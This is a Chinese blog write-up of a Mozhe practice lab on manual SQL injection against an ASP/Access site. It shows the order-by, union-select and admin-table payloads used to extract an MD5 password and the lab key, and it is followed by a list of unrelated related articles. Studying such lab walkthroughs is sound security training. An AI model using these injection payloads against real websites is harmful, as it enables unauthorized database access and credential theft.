SQL手工注入漏洞测试(Access数据库)-墨者


———靶场专栏———


声明:文章由作者weoptions学习或练习过程中的步骤及思路,非正式答案,仅供学习和参考。

靶场背景:

来源:

        墨者学院

简介:

        安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标:

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解Access的数据结构;
4.了解字符串的MD5加解密;

解题方向:

        手工进行SQL注入测试,获取管理密码登录。


解题思路:

        先按mysql思路来整吧,先猜列,然后查库,然后找数据。


解题步骤:

        

        一、猜列

new_list.asp?id=1 order by 4

order by 5的时候显示不正常,order by 4的时候显示正常。说明有四个字段。


        二、测试显位

new_list.asp?id=-2 union select 1,2,3,4

昂?啥也不显示,让盲注吗?找找资料先。哦哦哦,得先猜表名。

由于Access数据库特性招致sql注入是需要借助字典去猜解表明和列名。

如果猜解不到,可以自定义社工字典或者采用偏移注入。

/new_list.asp?id=-2 union select 1,2,3,4 from admin

显位在二和三。

直接猜名字和密码吧


new_list.asp?id=-2 union select 1,username,passwd,4 from admin

moke,7e6ec4fadf84938f(MD5解密后为27737201)

登陆后拿到KEY: mozhe8e380717a06636d76e5babba688


总结:

        难度:★★★★☆☆☆☆☆☆

        解析:难度不大,记录一下


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/202738.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

用例图是什么?用什么工具绘制?

在软件工程中,用例图属于UML(Unified Modeling Language)的一种图形模型,是一个交流需求和设计的重要工具。 用例图主要用来展示软件系统功能需求和相关角色之间的交互方式。它描述了一个系统如何与外界进行交互,表示…

MYSQL全语法速查(含示例)

文章目录 1.从简单的查询开始查找所有记录(SELECT *)查找记录中的所有登录名(SELECT)查找登录名为admin的密码(WHERE)查找电话号码非空的记录(IS NOT NULL)查找所在城市为北京或者用户名字是李四的记录(OR)查找所在城市为北京并且用户名字是张三的记录(AND)查找用户名字是李四或…

强化学习第1天:强化学习概述

☁️主页 Nowl 🔥专栏《机器学习实战》 《机器学习》 📑君子坐而论道,少年起而行之 ​​ 文章目录 介绍 强化学习要素 强化学习任务示例 环境搭建:gym 基本用法 环境信息查看 创建智能体 过程可视化 完整代码 结语…

有线传输介质

目录 1、双绞线 (1)无屏蔽双绞线 UTP(Unshielded Twisted Pair) (2)屏蔽双绞线 STP (Shielded Twisted Pair) (3)布线标准EIA/TIA-568-A (4)双绞线的特点 2、同轴电…

力扣:187. 重复的DNA序列(Python3)

题目: DNA序列 由一系列核苷酸组成,缩写为 A, C, G 和 T.。 例如,"ACGAATTCCG" 是一个 DNA序列 。 在研究 DNA 时,识别 DNA 中的重复序列非常有用。 给定一个表示 DNA序列 的字符串 s ,返回所有在 DNA 分子中…

变频电机的负载曲线核对

1.问题导入 月初偶然接触到一个很奇怪的现象,一款变频电机在各个档位下的输入线电流,如果负载不变,无论怎样切换变频器输出频率,电流会保持近乎恒定。这个特性让我感觉很好奇。直觉的理解,因为频率变化,而…

Linux指令学习

目录 1.ls指令 2.pwd命令 3.cd 指令 4. touch指令 5.mkdir指令 6.rmdir指令 && rm 指令 7.man指令 8.cp指令 9.mv指令 10.cat指令 11.more指令 12.less指令 13.head指令 14.find指令: -name 15.grep指令 16.zip/unzip指令: 17.tar…

Windows驱动中使用数字签名验证控制设备访问权限

1. 背景 在一般的驱动开发时,创建了符号链接后在应用层就可以访问打开我们的设备并进行通讯。 但我们有时候不希望非自己的进程访问我们的设备并进行交互,虽然可以使用 IoCreateDeviceSecure 来创建有安全描述符的设备,但大数的用户账户为了方…

二叉树的右视图[中等]

优质博文:IT-BLOG-CN 一、题目 给定一个二叉树的 根节点root,想象自己站在它的右侧,按照从顶部到底部的顺序,返回从右侧所能看到的节点值。 示例 1: 输入: [1,2,3,null,5,null,4] 输出: [1,3,4] 示例 2: 输入: [1,null,3] 输出…

西工大计算机学院计算机系统基础实验一(函数编写11~14)

稳住心态不要慌,如果考试周冲突的话,可以直接复制这篇博客和上一篇博客西工大计算机学院计算机系统基础实验一(函数编写1~10)-CSDN博客最后的代码,然后直接提交,等熬过考试周之后回过头再慢慢做也可以。 第…

如何做好软文推广的选题?媒介盒子分享常见套路

选题是软文推广的重中之重,主题选得好,不仅能够戳到用户,提高转化率,还能让各位运营的写作效率大幅度提升,今天媒介盒子就来和大家分享软文选题的常见套路,助力各位品牌进行选题。 一、 根据产品选题 软文…

C语言KR圣经笔记 4.3 外部变量

4.3 外部变量 一个C程序由一系列的外部对象组成,这些外部对象不是变量就是函数。“外部”这个形容词用于区别于“内部”,后者描述的是函数参数及其内部定义的变量。外部变量在所有函数之外定义,这样就可能会被很多函数使用。函数本身总是外部…

解决 video.js ios 播放一会行一会不行

最近用video 进行m3u8视频文件播放,但是途中遇到了 安卓和电脑端都能打开,ios有时可以播放有时播放不了 出现问题原因: ios拿到视频流前需要预加载视频,如果当前视频流还没有打开过,ios拿不到视频流的缓存,…

【AI-Fix】解决地图展示包leafmap在Jupyter NoteBook中地图不显示的问题

1. 问题描述 新创建的环境想使用leafmap在Jupyter中进行地图展示,结果发现运行完成之后不显示,不论怎么重启都没有办法显示出来,以经验来看,多半是缺了包了。 于是去leafmap的官方文档查找原因,一开始并没有发现什么问…

C++ 拷贝构造函数

目录 拷贝构造函数概述 拷贝构造函数特性 拷贝构造函数概述 当我们定义好一个类,不做任何处理时,编译器会自动生成以下6个默认成员函数: 默认成员函数:如果用户没有手动实现,则编译器会自动生成的成员函数。 同样&…

怎么学C++

学习目标: 一篇文章教你怎么学 C 学习内容: 怎么学C 学习时间: 什么时候都行 学习产出: CSDN 技术博客 1 篇 主文 以下是学习C的一些基本步骤: 学习C语言基础:包括数据类型、运算符、控制语句等内容。 学…

JavaWeb(十)

一、JavaWeb概述 Web:全球广域网,也称为万维网(www),能够通过浏览器访问的网站。 JavaWeb:使用 Java技术进行web互联网开发。 二、JavaWeb 技术栈 2.1、B/S 架构 B/S 架构:Browser/Server,浏览器/服务器…

解决找不到msvcr120.dll无法执行代码的4个方法,快来看看解决方法!

在计算机使用过程中,我们经常会遇到一些错误提示,其中最常见的就是“缺少xxx.dll文件”。而msvcr120.dll就是其中之一。那么,msvcr120.dll到底是什么呢?它又有什么作用呢?本文将从多个方面对msvcr120.dll进行详细的解析…

华为鸿蒙爆发真实力!原生应用媲美iOS,使用流畅度将提升20至30%

随着华为鸿蒙原生应用开发计划的启动,一场席卷全球的科技浪潮正在涌动。鸿蒙生态的快速发展,吸引了无数企业和开发者的关注,他们纷纷拥抱这个新兴的生态系统,共同构建一个更加繁荣的鸿蒙世界。 华为鸿蒙原生应用开发计划引爆全球…

Java中的并发编程:深入理解CountDownLatch

Java中的并发编程:深入理解CountDownLatch 本文将深入探讨Java中的并发编程,重点关注CountDownLatch的使用。通过理解这些概念和技术,我们可以编写出更高效、稳定的Java程序。 一、CountDownLatch简介 CountDownLatch是Java中的一个同步工具…